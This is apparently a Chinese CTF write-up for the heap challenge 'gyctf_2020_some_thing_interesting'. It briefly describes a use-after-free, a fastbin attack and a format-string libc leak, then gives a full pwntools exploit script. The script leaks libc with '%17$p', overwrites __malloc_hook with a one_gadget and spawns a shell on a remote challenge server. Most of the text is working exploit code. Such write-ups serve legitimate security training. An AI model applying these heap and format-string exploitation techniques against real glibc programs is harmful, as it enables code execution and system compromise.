free没弄干净image.png
    函数有edit的功能,所以这里我们可以用fast bin attack的方式
    image.png
    然后是泄露libc,通过之前的学习的方式来泄露libc都不能,所以得转变思路。看到文件多了个很奇怪的check功能
    image.png
    这里有格式化字符串漏洞我们只要在输入密码之后利用格式化字符串漏洞来泄露栈上的内容就行了。我们发现栈上有这个地址
    image.png
    于是我们的libc也泄露完成

    1. from pwn import*
    2. from LibcSearcher import*
    3. context.log_level = 'debug'
    4. #context.arch = 'amd64'
    5. io =process('./gyctf_2020_some_thing_interesting')
    6. io = remote("node4.buuoj.cn",28700)
    7. elf = ELF('./gyctf_2020_some_thing_interesting')
    8. libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    9. libc = ELF('libc-2.23.so')
    10. def debug():
    11.     gdb.attach(io)
    12.     pause()
    13. def creat(osize,ovalue,rsize,rvalue):
    14.     io.recvuntil("> Now please tell me what you want to do :")
    15.     io.sendline("1")
    16.     io.recvuntil("> O's length : ")
    17.     io.sendline(str(osize))
    18.     io.recvuntil("> O : ")
    19.     io.sendline(ovalue)
    20.     io.recvuntil("> RE's length : ")
    21.     io.sendline(str(rsize))
    22.     io.recvuntil("> RE : ")
    23.     io.sendline(rvalue)
    24. def edit(id,ovalue,rvalue):
    25.     io.recvuntil("> Now please tell me what you want to do :")
    26.     io.sendline("2")
    27.     io.recvuntil("> Oreo ID : ")
    28.     io.sendline(str(id))
    29.     io.recvuntil("> O : ")
    30.     io.sendline(ovalue)
    31.     io.recvuntil("> RE : ")
    32.     io.sendline(rvalue)
    33. def free(id):
    34.     io.recvuntil("> Now please tell me what you want to do :")
    35.     io.sendline("3")
    36.     io.recvuntil("> Oreo ID : ")
    37.     io.sendline(str(id))
    38. def show(id):
    39.     io.recvuntil("> Now please tell me what you want to do :")
    40.     io.sendline("4")
    41.     io.recvuntil("> Oreo ID : ")
    42.     io.sendline(str(id))
    43. io.recvuntil("> Input your code please:")
    44. io.send("OreOOrereOOreO%17$p")
    45. io.recvuntil("> Now please tell me what you want to do :")
    46. io.sendline("0")
    47. io.recvuntil("Your Code is OreOOrereOOreO")
    48. libc_start_main=int(io.recv(14),16)-240
    49. print("libc_start_main---------->"+hex(libc_start_main))
    50. libcbase = libc_start_main - libc.sym["__libc_start_main"]
    51. log.success("libcbase---------->"+hex(libcbase))
    52. creat(0x60,"aaa",0x60,"bbb") #1
    53. creat(0x60,"ccc",0x60,"ddd") #2 
    54. free(1)
    55. ptr = libcbase + libc.sym["__malloc_hook"] - 0x23
    56. one_gadget =[0x45216,0x4526a,0xf02a4,0xf1147]
    57. edit(1,p64(ptr),p64(ptr))
    58. #debug()
    59. payload = b'a'*0x13 + p64(one_gadget[3]+libcbase)
    60. creat(0x60,"eee",0x60,payload)
    61. io.recvuntil("> Now please tell me what you want to do :")
    62. io.sendline("1")
    63. io.recvuntil("> O's length : ")
    64. io.sendline("50")
    65. io.interactive()